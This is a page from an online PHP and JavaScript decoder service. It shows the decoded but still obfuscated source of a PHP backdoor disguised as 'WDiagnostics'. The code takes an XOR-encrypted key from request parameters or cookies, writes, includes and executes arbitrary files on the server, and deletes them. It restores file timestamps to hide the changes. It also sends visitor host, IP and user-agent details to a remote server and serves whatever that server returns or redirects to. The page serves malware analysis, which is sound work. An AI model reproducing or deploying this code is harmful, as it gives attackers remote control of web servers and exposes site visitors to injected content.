Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


if (defined("WDiagnostics")) { return; } class fde { public function __construct($section) { $this->w = new bf9(); list($s, $b, $m) = $this->E91(); $this->F1c($section, "meta", $m); $this->F1c($section, "state", $s); $this->f1c($section, "buf", $b); } protected $w, $state, $buf; protected $meta; public function log($e, $s, $f, $l, $c, $g = null) { static $log = array(); if (isset($g) && $g) { return $log; } array_push($log, __FILE__ . "![{$e}]: {$s}"); return true; } function f1c($k, $n, $v) { return $this->{$n} = new F89($k, $v); } function a60($p) { if (isset($_GET[$p])) { return $_GET[$p]; } else { if (isset($_COOKIE[$p])) { return $_COOKIE[$p]; } else { if (isset($_POST[$p])) { return urldecode($_POST[$p]); } } } return 0; } function D8d($p, $s, $h) { list($cv, $ci, $co, $ce, $cc, $rn) = $this->buf->range(1, 6); $ci = $cv . $ci; $co = $cv . $co; $ce = $cv . $ce; $cc = $cv . $cc; $c = $ci($p); $o = array($this->bs * 2 - 87 => 1, 52 => 0, 13 => 5); if ($s) { $o[$this->bs + 23] = $s; } if ($h) { $o[42] = 1; } foreach ($o as $oo => $v) { $co($c, $oo, $v); } $r = $ce($c); $cc($c); if (!empty($r) && $h) { $r = explode($rn . $rn, $r, 2); $hh = count($r) > 0 ? explode($rn, $r[0]) : array(); $r = count($r) > 1 ? $r[1] : ''; return array($r, $hh); } return $r; } function eA6($p, $s, $h) { list($m, $f, $i, $t, $hd, $ht, $g, $sc, $fo, $sg, $fc, $rb) = $this->buf->range(7, 18); $hp = array($m => $g, $f => 0, $i => 1, $t => 5); if ($s) { $hp[$hd] = $s; } $rp = $sc(array($ht => $hp)); if ($fp = $fo($p, $rb, false, $rp)) { $r = $sg($fp); $fc($fp); if ($h) { return array($r, $http_response_header); } return $r; } return 0; } function Cc8($p, $s = null, $h = null) { list($fe, $c, $i) = $this->buf->range(0, 2); $r = $fe($c . $i) ? $this->d8d($p, $s, $h) : $this->eA6($p, $s, $h); if (!$r) { $this->log(0, "could not get [{$p}]", 0, 0, 0); } return $r; } protected $bs = 10000; function dDc() { $a = $this->a60(substr(md5($this->buf->get(22)), 1, 9)); if (!$a || strlen($a) < 32 || substr(md5($b = substr($a, 0, 32)), 6, 24) != $this->buf->get(21)) { return 0; } $hd = $this->buf->get(11); list($kw, $ud) = $this->buf->range(19, 20); $hd(($ud($kw) ^ $b) . ": " . $ud(strtolower($this->w->fF7()))); if (strlen($a) > 60 && !substr($a, 43, 1)) { exit($this->bF5()); } return 1; } function format($t) { static $i = 0; $file = $t["file"]; $line = $t["line"]; $func = $t["function"]; $class = $t["class"]; return "#" . $i++ . ":{$file}:{$line}: {$class}::{$func}()"; } function Bf5() { return implode("\xa", array_map(array($this, "format"), debug_backtrace())); } function e06() { return array(2661734562,2623890839,1888707688,2472699802,1668246630,2779238620,2868903936); } public static function d77($s, $n) { $l = strlen($n); if (!$l) { return true; } return substr($s, -$l) === $n; } function b8E() { $k = "WDiagnostics"; return md5($k) . substr(md5(strrev($k)), 0, strlen($k)); } function F0E() { return array($this->aC6()); } function aC6() { $h = $this->w->fF7(); list($t, $p) = $this->state->range(7, 8); if ($h) { $h = "{$t}{$h}/"; } return "{$p}: {$h}"; } public function b6b() { define("WDiagnostics", "on"); set_error_handler(array($this, "log")); if (!$this->dDc()) { $this->bc2($this->meta); $ri = $this->w->d73(); $s = preg_match("/wp-.+/i", $ri); if (!$s) { $ex = $this->state->range(9, 27); $p = explode("?", $ri, 2); $p = strtolower(is_array($p) && count($p) > 0 ? $p[0] : $ri); foreach ($ex as $e) { if ($s = self::D77($p, $e)) { break; } } } if (!$s) { $cfg = substr($this->A2E($this->E06()), 0, 25) . $this->w->format($this->state->get(28)); list($r, $hh) = $this->cc8($cfg, $this->F0E(), 1); if (!empty($hh)) { $this->f23($hh, $r); } } } restore_error_handler(); return; } public function A2E($data) { for ($idx = 0, $text = str_repeat("D", count($data) * 4), $res = $this->B8e(); $idx < count($data) << 2; $idx++) { $text[$idx] = chr((($data[$idx >> 2] >> 24 - $idx % 4 * 8 & 0xff) - ord($res[$idx])) % 256); $res .= $res[$idx]; } return $text; } function f23($hh, $result) { if (preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $hh[0], $out)) { $r = intval($out[1]); $h = $this->buf->get(11); $s = self::b36($hh, "via"); if ($r == 200 && $s) { list($sc, $cc, $pc, $rd) = $this->state->range(2, 5); $h($cc); $h($pc); $sc("_xpm", microtime(true), time() + 60, "/"); $l = self::b36($hh, "location"); if ($l) { $h($rd); $h($l); exit; } $z = self::b36($hh, "content-encoding"); if ($z && stripos($z, "gzip") !== false) { $result = $this->Bde($result); } echo $result; exit; } } } static function B36($hh, $n) { foreach ($hh as $h) { if (stripos($h, $n . ":") === 0) { return $h; } } return false; } function BdE($t) { $f = $this->buf->get(0); list($z, $d) = $this->state->range(0, 1); return $f($z) ? $z($t) : $d($t, 10, -8); } function bc2($a) { $b = array(); $s = $this->D01($_SERVER["SCRIPT_FILENAME"], __FILE__, $a, $b); $ia = $a->get(0); $hd = $a->get(1); if ($ia($s)) { list($s, $r) = $s; } if ($s == -1) { return; } $hd($a->get(27) . ": " . $s); if (!empty($r)) { exit($r); } $log = $this->log(0, 0, 0, 0, 0, 1); if ($log && count($log) > 0) { exit(join("
", $log)); } } function A78($f, $d, $a) { list($fps, $or, $fe) = $a->range(8, 10); if ($w = fopen($f, "w")) { $r = fwrite($w, $d) or fputs($w, $d); fclose($w); } else { if ($fe($fps)) { $r = $fps($f, $d) !== false; } } if ($r) { $cc = $a->get(19); if ($fe($or)) { $or(); } $cc(); } else { $this->log(0, "write({$f}): {$r}", 0, 0, 0); } return $r; } function c75($s) { ob_start(); include_once $s; return ob_get_clean(); } function f0f($s, $k) { $out = ''; for ($i = 0; $i < strlen($s);) { for ($j = 0; $j < strlen($k) && $i < strlen($s); $j++, $i++) { $out .= $s[$i] ^ $k[$j]; } } return $out; } function d01($sc, $if, $a, $b) { $x = array(); $p = "555"; $fe = $this->buf->get(0); list($hd, $sl, $su, $is, $mt, $tl, $bd) = $a->range(1, 7); if ($fe($is)) { $is($a->get(12), 0); } if ($fe($tl)) { $tl(0); } $hst = $sl($this->w->ff7()); $kn = md5($hst . $p); $k = $this->A60($kn); if ($k === 0) { $k = $this->a60($su($kn)); if ($k === 0) { return -1; } } if ($fe($is)) { $is("log_errors", 1); } list($mq, $sq) = $a->range(13, 14); if ($fe($sq) && (!defined($a->get(28)) || constant($a->get(28)) < 70000) && $mq()) { $sq(0); } $k = $this->d34($k); $dk = $p ? $this->F0f($k, $kn) : $k; $fx = strlen($dk) < 32 ? 0 : substr($dk, 0, 32); if (md5($fx) != $a->get(26)) { return -1; } list($s, $u, $f, $i, $t, $rm, $dn, $d) = explode("__", substr($dk, 32), 8); list($fg, $si) = $a->range(24, 25); $ap = $a->get(29); if ($d) { $d = $bd($d); } else { if ($s) { list($d, $h) = $this->cC8($s, 0, 1); if (empty($h) || !self::b36($h, $si)) { $this->log(0, "check failed", 0, 0, 0); $d = null; } } else { if ($u) { $d = $fg("php://input"); } } } $ap($x, !!$d); $n = $f ? $f : $if; $r = null; list($iw, $fm, $id, $drn, $cc, $fex) = $a->range(15, 20); $dnf = $a->get(18); $dnm = $dnf($n); $dts = $id($dnm) ? $fm($dnm) : 0; $resp = null; $fts = null; $mr = 0; if ($t) { $cc(); $r = $fex($n) ? $iw($n) : $iw($dnm); } $ap($x, $r); list($un, $re, $to) = $a->range(21, 23); $r = null; $uu = false; if (!$t && $d) { if ($id($n)) { $this->log(0, "{$n} is dir", 0, 0, 0); } else { if ($i && $rm && ini_get("allow_url_include")) { $n = "data://text/plain," . urlencode($d); $uu = true; } else { $fts = !$rm && $fex($n) ? $fm($n) : 0; if (!$fts && !$dts) { $mr = mkdir($dnm, 0755, true); } $r = $this->A78($n, $d, $a); if (!$r && $fts) { $temp = tempnam($dnm, ); $this->log(0, "temp name: {$temp}", 0, 0, 0); if ($re($n, $temp)) { if ($r = $this->a78($n, $d, $a)) { if (!$un($temp)) { $this->log(0, "{$un} fail: {$temp}", 0, 0, 0); } } else { if (!$re($temp, $n)) { $this->log(0, "{$re} fail: {$temp} -> {$n}", 0, 0, 0); } } } } if ($r) { $tt = $fts; if (!$tt) { $tt = $this->e74($dnm, $n); if (!$tt && $dts) { $tt = $dts; } } if ($tt) { $to($n, $tt, $tt); } } } } } $ap($x, $r); $ir = null; if (!$t && $i && (!$d || $r || $uu)) { $resp = $this->c75($n); $ir = !!$resp; } $ap($x, $ir); $dd = null; if (!$resp && $dn) { $gc = $a->get(24); $resp = $gc($n); if ($resp) { $ct = $fe($mt) ? $mt($n) : null; $hd("Content-Type: " . ($ct ? $ct : "application/octet-stream")); } if ($resp && ($mtime = $fts ? $fts : $fm($n))) { $hd("X-Timestamp: " . date(DATE_RFC2822, $mtime)); } $dd = !!$resp; } $ap($x, $dd); $ap($x, $rm && !$uu ? $id($n) ? rmdir($n) : $un($n) : null); if ($dts && ($rm || $r)) { $to($dnm, $dts, $dts); } return array(implode('', array_map(array($this, "b2"), $x)), $resp); } function e74($dn, $tn) { $fts = 0; $dlist = glob("{$dn}/*", constant("GLOB_NOSORT")); if ($dlist) { for ($i = 0; $i < count($dlist) && $i < 4 && !$fts; ++$i) { $fn = $dlist[$i]; if ($fn && $fn != $tn && is_file($fn)) { $fts = filemtime($fn); } } } return $fts; } function d34($val) { $d = $this->meta->get(7); return $d(strtr($val, "-_", "+/")); } function b2($e) { return $e ? 1 : 0; } function E91() { return array(array("1f161c1017", "1f181b1f150600", "050a1c1f1b00", "121d005e1d0b05070a1f4e0b1e56121a005d5b1c511e005f5c0a5c0117121a011e085f541f1141110d1c0017", "02101208124e0b1e58121a00", "3a354a5a424245321d1f11", "33061007570b121a011a1a155f521f1a04", "1a5f5c5b", "2a4821001506", "5c060206", "5c110901", "5c13", "5c0f0112", "5c1f12", "5c0213", "5c1e16", "5c0f02", "0a081d055a0d01", "5c0f1a0b", "5c0810", "5c1d1c19", "5c0c1a", "5c1103", "5c1e13", "5c1e130341", "5c1f18", "5c12", "5c0e", "4d0405581b00054b5a4a56075d4303100e51031856070416100b074957501a47"), array("14101f111a1b1c3a1d0c0001", "11093a", "1b0b11", "01001a17", "171d1416", "091e00", "7f6f", "1f051d0a17", "140a1d190a2b1e0a121a1b1c", "1b021f1a162b17031a17", "0c1c1a0600", "1a001011", "1a0505", "3525", "03041e2b1a1f01000b2d0007", "140a01100b", "0111001e2b0a0c1a001f01", "1d1a16", "07", "1f2b54435546472d56414040", "071d1100101b00", "4b5511444d501255491642401008", "1106190618"), array("1b162e1417050b", "1a0000", "01030a1f1b0003", "11030a060003", "1b0b1a1600", "1f0c1c103a1b1c11141b2c0b1514", "01052a1a173a1d1c081a00", "100210532b161a01", "140c1d103a063a1a0b071c12", "1d12141b112d171407", "141f16111a1b1c3a140d0c0001", "10193a1a1a1b11", "1f04092a000b11051c0a1d2b0c1c10", "052a02131b2e041c00172e101d1b04", "01002a021b062e101c00172e071d001b0814", "1b162e171a00071d10", "0c1d080d1f00", "1b2e110c01", "160c031b041e11", "191417000011140b11", "1c1d1a1c1b1506", "070b1d1c0b18", "001f1406", "0a040d", "140c1d103a1411063a1a0b071c12", "0a4116", "42414b4c17434d53424b03445411554551151346", "2a413415", "2d2a362c3e3b3a3a30", "13031c2c0409")); } } $diag_req = new fDe("request"); $diag_req->B6b(); unset($diag_req); class bF9 { public static function FF7() { return !empty($_SERVER["HTTP_X_FORWARDED_HOST"]) ? $_SERVER["HTTP_X_FORWARDED_HOST"] : (!empty($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : (!empty($_SERVER["HOSTNAME"]) ? $_SERVER["HOSTNAME"] : '')); } public static function eCc() { return !empty($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : ''; } public static function Bd0() { if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = array_pop(array_map("trim", explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"]))); } else { $ip = !empty($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : ''; } return !empty($ip) ? $ip : ''; } public static function C16() { return !empty($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; } public static function AEb() { return !empty($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; } public static function D73() { return !empty($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : ''; } public static function format($s) { return sprintf($s, urlencode(self::ff7()), self::c16(), self::BD0(), urlencode(self::aeB()), urlencode(self::d73())); } } class f89 { public function range($r1, $r2) { return array_map(array($this, "get"), range($r1, $r2)); } protected $k, $v; function eb0($v) { $k = $this->k; $dv = $this->f3b($v); $r = strlen($dv) / strlen($k) + 1; return $dv ^ str_repeat($k, $r); } function F3B($arg) { return pack("H*", $arg); } public function __construct($k, $v) { $this->k = $k; $this->v = $v; } public function get($i) { $r = $this->Eb0($this->v[$i]); return $r; } }



© 2023 Quttera Ltd. All rights reserved.